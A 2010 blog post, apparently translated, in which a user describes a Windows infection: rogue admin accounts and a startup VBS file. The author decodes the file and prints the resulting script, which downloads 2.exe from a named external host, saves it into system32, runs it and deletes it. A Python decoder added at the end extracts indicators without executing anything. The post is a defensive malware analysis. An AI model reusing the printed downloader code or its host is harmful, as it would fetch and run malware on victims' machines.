My computer got infected: learning a bit about VBS

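Today I happened to discover that my computer had been infected. Every time it booted, my Administrator account was not shown on the logon screen, and two unexplained administrator accounts had been created, which was quite frustrating. Checking the startup items (MSCONFIG), I found several suspicious new entries; among the startup items was something like  C:\WINDOWS\system32\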

http1.vbs. Opened as a file, it shows a piece of code in the form of a long parenthesised list of numbers.

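I could not make sense of it. First I deleted the startup item, but after rebooting the problem was still there. I opened the registry (regedit), searched for the startup entry and deleted it from the registry, then opened HTTP1.VBS and used a C# program to rebuild that code and print out the content passed to Execute: runner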
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://le19.3322.org/2.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\windows\system32\놦즽쓐럢1433.exe",2
wscript.sleep 20000
Shell.Run ("c:\windows\system32\놦즽쓐럢1433.exe")
wscript.sleep 10000
set fso=createobject("scripting.filesystemobject")
fso.DeleteFile( "c:\windows\system32\놦즽쓐럢1433.exe")

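Now it is clear at a glance what this VBS is trying to do. I hope that deleting all of this will be effective. The biggest problem is that I do not know what the virus file 놦즽쓐럢1433.exe executed. I hope it will not affect my computer too much.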

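Summary: how the infection happens: browse a website + load and execute the virus file + download the VBS file + add a startup item + add a registry entry + execute the virus file + (cause computer malfunction) + delete the virus file.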
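
An added example (not the author's C# program): a Python decoder for this kind of character-code list that rebuilds the script text without executing it and lists the URLs and file paths it refers to. It also covers negative codes, which VBScript's Asc/Chr use for double-byte characters as signed 16-bit values in the system code page; casting them straight to UTF-16 yields unrelated Hangul glyphs. The sample input is constructed, the helper names are hypothetical, and the GBK (code page 936) default is an assumption.

```python
import re

def _codes(text):
    return [int(t) for t in re.findall(r"-?\d+", text)]

def decode_charcodes(text, codepage="gbk"):
    """Rebuild the script text from a character-code list without running it."""
    out = bytearray()
    for n in _codes(text):
        if n < 0:
            n += 0x10000                      # signed 16-bit -> unsigned
        if n > 0xFF:
            out += bytes([n >> 8, n & 0xFF])  # double-byte char: lead, trail
        else:
            out.append(n)
    return out.decode(codepage, errors="replace")

def naive_decode(text):
    """Cast each code straight to a UTF-16 unit (wrong for double-byte codes)."""
    return "".join(chr(n & 0xFFFF) for n in _codes(text))

def encode_like_asc(script, codepage="gbk"):
    """Build a constructed sample the way Asc() would number each character."""
    codes = []
    for ch in script:
        n = int.from_bytes(ch.encode(codepage), "big")
        codes.append(n - 0x10000 if n >= 0x8000 else n)
    return "(" + ",".join(map(str, codes)) + ")"

def extract_indicators(script):
    """List the URLs and quoted drive paths a decoded script refers to."""
    urls = re.findall(r'"(https?://[^"]+)"', script, re.I)
    paths = re.findall(r'"([a-z]:\\[^"]+)"', script, re.I)
    return {"urls": sorted(set(urls)), "paths": sorted(set(paths))}

# Constructed sample (not the script from this page); the host is a placeholder.
SAMPLE_SCRIPT = ('Req.Open "GET","http://example.invalid/a.bin",0\r\n'
                 'Out.SaveToFile "c:\\temp\\中文1.bin",2\r\n')
SAMPLE = encode_like_asc(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(decode_charcodes(SAMPLE))
    print(repr(naive_decode("-10544,-12604")))  # Hangul, not the real characters
    print(extract_indicators(decode_charcodes(SAMPLE)))
```

If the decoded text contains replacement characters, the script was written under a different code page; pass that codec name as `codepage`.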

posted @ 2010-10-05 11:42  NewSoftsNet